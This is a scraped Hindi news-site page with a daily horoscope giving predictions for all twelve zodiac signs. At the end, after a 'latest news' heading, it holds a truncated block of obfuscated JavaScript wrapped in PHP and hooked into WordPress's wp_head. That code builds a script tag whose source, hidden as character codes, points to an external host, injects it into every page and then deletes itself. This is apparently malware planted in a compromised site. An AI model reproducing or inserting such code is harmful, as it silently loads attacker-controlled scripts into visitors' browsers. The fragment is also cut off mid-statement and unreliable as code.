Saturday, July 27, 2024
spot_img

21 अगस्त राशिफल– आज मेष राशि वाले जातक रहें सावधान, इन कष्टों से हो सकता हैं सामना, तुला राशि वालों को भी इन कुछ खास उपायों से मिल सकता हैं लाभ

मेष राशि- आज आप संयत रहें। व्‍यर्थ के क्रोध एवं वाद-विवाद की स्‍थ‍ित‍ि बन सकती है, ख्याल रखें। सन्तान की ओर से सुखद समाचार मिल सकता है। शैक्षिक कार्यों में सुधार होगा। खर्चों में वृद्धि होगी, फिजूलखर्ची में नियंत्रण रखें। आज आप आत्मविश्वास से परिपूर्ण रहेंगे।आपकी वाणी में सौम्यता रहेगी। कार्यक्षेत्र में परिश्रम अधिक रहेगा। धर्म-कर्म में रुचि रहेगी, धार्मिक गतिविधियों में शामिल होंगे। परिवार के साथ किसी धार्मिक स्थान की यात्रा पर जा सकते हैं। माता को स्वास्थ्‍य विकार हो सकते हैं। मित्रों का सहयोग मिलेगा।

वृषभ राशि- आज आपको पूरा दिन मानसिक शान्ति‍ रहेगी। आपका पारिवारिक जीवन सुखमय रहेगा। नौकरी में कार्यक्षेत्र में परिवर्तन के साथ कार्यक्षेत्र में वृद्धि हो सकती है। परिश्रम अधिक रहेगा। आत्मसंयत रहें। कारोबार की स्थिति सन्तोषजनक रहेगी। धैर्यशीलता में कमी रहेगी, संयम और धैर्य बनाकर रखें। अपने स्वास्थ्‍य के प्रति सतर्क रहें। कुटुम्ब-परिवार में धार्मिक कार्य हो सकते हैं। लाभ के अवसर मिलेंगे। मित्रों का सहयोग मिलेगा। शैक्ष‍िक कार्यों में सफलता के योग हैं।

मिथुन राशि- आज आपके अन्दर आत्मविश्वास में वृद्धि होगी, संयम और धैर्य बनाकर रखें। माता के स्वास्थ्‍य में सुधार होगा। नौकरी में यात्रा पर जाना पड़ सकता है। भागदौड़ अधिक रहेगी। स्वास्‍थ्‍य के प्रति सचेत रहें। मन में शान्ति एवं प्रसन्नता के भाव रहेंगे। आज पूरा दिन पारिवारिक जीवन में सुख-शान्ति रहेगी। आज आपके अन्दर आशा और निराशा के मिश्रित भाव बने रहेंगे। आपको कार्यक्षेत्र में कठिनाइयों का सामना करना पड़ सकता है। धन लाभ होगा। आज आपको भाइयों का सहयोग म‍िलेगा।

कर्क राशि- आज आपका मन प्रसन्न रहेगा। संयत रहें। बातचीत में सन्तुलित रहें। कारोबार में सुधार होगा। पिता से भी धन की प्राप्ति‍ हो सकती है। शैक्षिक कार्यों में सफलता मिलेगी। आत्मसंयत रहें। अपनी भावनाओं को वश में रखने का प्रयास करें आपके लिए बेहतर होगा। कार्यक्षेत्र में परिश्रम की अधिकता रहेगी। स्वास्थ्‍य के प्रति सचेत रहें। नौकरी में अफसरों से मतभेद हो सकते हैं, बातचीत में संयम बरतें। परिवार का साथ मिलेगा। म‍ित्रों के सहयोग से आय के नए स्रोत व‍िकस‍ित होंगे, आर्थिक स्थिति में सुधार होगा।

सिंह राशि- आज आपकी वाणी के प्रभाव में वृद्धि होगी। कारोबार से धन की प्राप्ति‍ होगी। मित्रों का सहयोग मिलेगा। सन्तान के स्वास्थ्‍य का ध्यान रखें। शैक्षिक कार्यों में व्यवधान आ सकते हैं। आशा-निराशा के मिश्रित भाव रहेंगे, संभल कर रहे। बातचीत में संयत रहें। आत्मविश्वास में वृद्धि होगी। अति उत्साही होने से बचें। खानपान में रुचि बढ़ेगी, लेकिन स्वास्थ्‍य के प्रति सतर्क रहें। किसी पुराने मित्र से पुनःसम्पर्क हो सकते हैं।

कन्‍या राशि- आज आपका मन प्रसन्न रहेगा। आपके अन्दर आत्मविश्वास में वृद्धि होगी।आपका पारिवारिक जीवन सुखमय रहेगा। लेखनादि-बौद्धिक कार्यों में व्यस्तता बढ़ेगी। आय के साधन बनेंगे, आर्थिक स्थिति में सुधार होगा। आज आपकी धार्मिक संगीत में रुचि रहेगी। किसी मित्र के सहयोग से नौकरी के अवसर मिल सकते हैं। किसी दूसरे स्थान पर भी जाना पड़ सकता है। अनियोजित खर्चों में वृद्धि होगी,फिजूलखर्ची में नियंत्रण रखें। कारोबार में परिवर्तन की सम्भावना बन रही है। परिवार का सहयोग मिलेगा।

तुला राशि- आज आप संयत रहें। क्रोध से परेशान रहेंगे, क्रोध को काबू में रखे। कारोबार में परिवर्तन हो सकता है। भागदौड़ अधिक रहेगी। मित्रों का सहयोग मिलेगा। अपनी भावनाओं का वश में रखें। आपकी लेखनादि-बौद्धिक कार्यों में व्यस्तता रहेगी। परिवार में कलहपूर्ण वातावरण हो सकता है। मन अशान्त रहेगा, शांति के लिए प्रयास करें। आज आपके कुटुम्ब-परिवार में धार्मिक कार्य होंगे। आय की स्थिति में सुधार होगा, आर्थिक स्थिति में सुधार होगा। आपके मान-सम्मान में वृद्धि होगी। शासन सत्ता का सहयोग मिलेगा।

वृश्चिक राशि- आज आपके अन्दर आत्मविश्वास से भरपूर रहेंगे। नौकरी में तरक्की मिल सकती है। शासन-सत्ता का सहयोग मिलेगा। मान-सम्मान की प्राप्ति‍ होगी। शैक्षिक कार्यों के लिए यात्रा पर जा सकते हैं। वस्त्रों के प्रति रुझान बढ़ेगा। दाम्पत्य सुख में वृद्धि होगी। स्वास्थ्‍य के प्रति सतर्क रहें। रोग से पीड़ित हो सकते हैं। आज आपका रहन-सहन कष्टमय हो सकता है। परिवार का सहयोग मिलेगा। नौकरी में कोई अतिरिक्त जिम्मेदारी मिल सकती है, तैयार रहें।

धनु राशि- आज आप मानसिक शान्ति बनाये रखने के प्रयास करें। कारोबार की स्थिति में सुधार होगा। यात्रा लाभप्रद रहेगी। अपनी सेहत का ध्यान रखें। शैक्षिक कार्यों के सुखद परिणाम मिलेंगे। घर-परिवार में धार्मिक कार्य हो सकते हैं। वस्त्रों पर खर्च बढ़ सकते हैं। माता-पिता से आर्थिक सहयोग मिल सकता है। शैक्षिक कार्यों के लिए व‍िदेश यात्रा पर जाना हो सकता है। मित्रों का सहयोग मिलेगा। अपने जीवनसाथी के स्‍वास्‍थ्‍य का ध्‍यान रखें।

मकर राशि-आज आपके मन में नकारात्मकता के प्रभाव बने रहेंगे, सकारात्मकता के लिए प्रयास करें। संतान की ओर से सुखद समाचार मिल सकते हैं। किसी सम्पत्ति से धन की प्राप्ति‍ हो सकती है। संयत रहें। परिवार की परिस्थितियों पर ध्यान रखें। कला एवं संगीत में रुचि बढ़ सकती है। नौकरी में परिवर्तन की सम्भावना बन रही हैं। आय में वृद्धि होगी, आर्थिक स्थिति में सुधार होगा। शैक्षिक कार्यों के सुखद परिणाम मिलेंगे। मान-सम्मान बढ़ेगा। कार्यक्षेत्र में परिश्रम अधिक रहेगा।

कुंभ राशि- आज आपके अन्दर आत्मविश्वास में कमी रहेगी। संयत रहें। अपनी भावनाओं को वश में रखने का प्रयास करें आपके लिए बेहतर होगा। कारोबार पर ध्यान दें। कठिनाइयां आ सकती हैं। भागदौड़ अधिक रहेगी। आज आपका रहन-सहन कष्टमय हो सकता है। पठन-पाठन में रुचि रहेगी। शैक्षिक कार्यों के सुखद परिणाम मिलेंगे। मानसिक अशांति बनी रहेगी।नौकरी में स्थान परिवर्तन की सम्भावना बन रही है। सुख में वृद्धि होगी। परिश्रम अधिक रहेगा। तरक्की के योग बन रहे हैं।

मीन राशि- नकारात्मक विचारों के प्रभाव से बचें, सकारात्मकता के लिए प्रयास करें। कारोबार में वृद्धि होगी। लाभ के अवसर मिलेंगे। पारिवारिक जीवन सुखमय रहेगा। अपनी भावनाओं को वश में रखें, आपके लिए बेहतर होगा। परिवार का सहयोग मिलेगा। वाणी में सौम्यता रहेगी। कार्यक्षेत्र में समस्याएं अभी बनी रहेंगी। किसी मित्र के सहयोग से धनार्जन के साधन बन सकते हैं। स्वास्थ्‍य का ध्यान रखें। मित्रों का सहयोग रहेगा। संबंधों में नि‍कटता आएगी।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>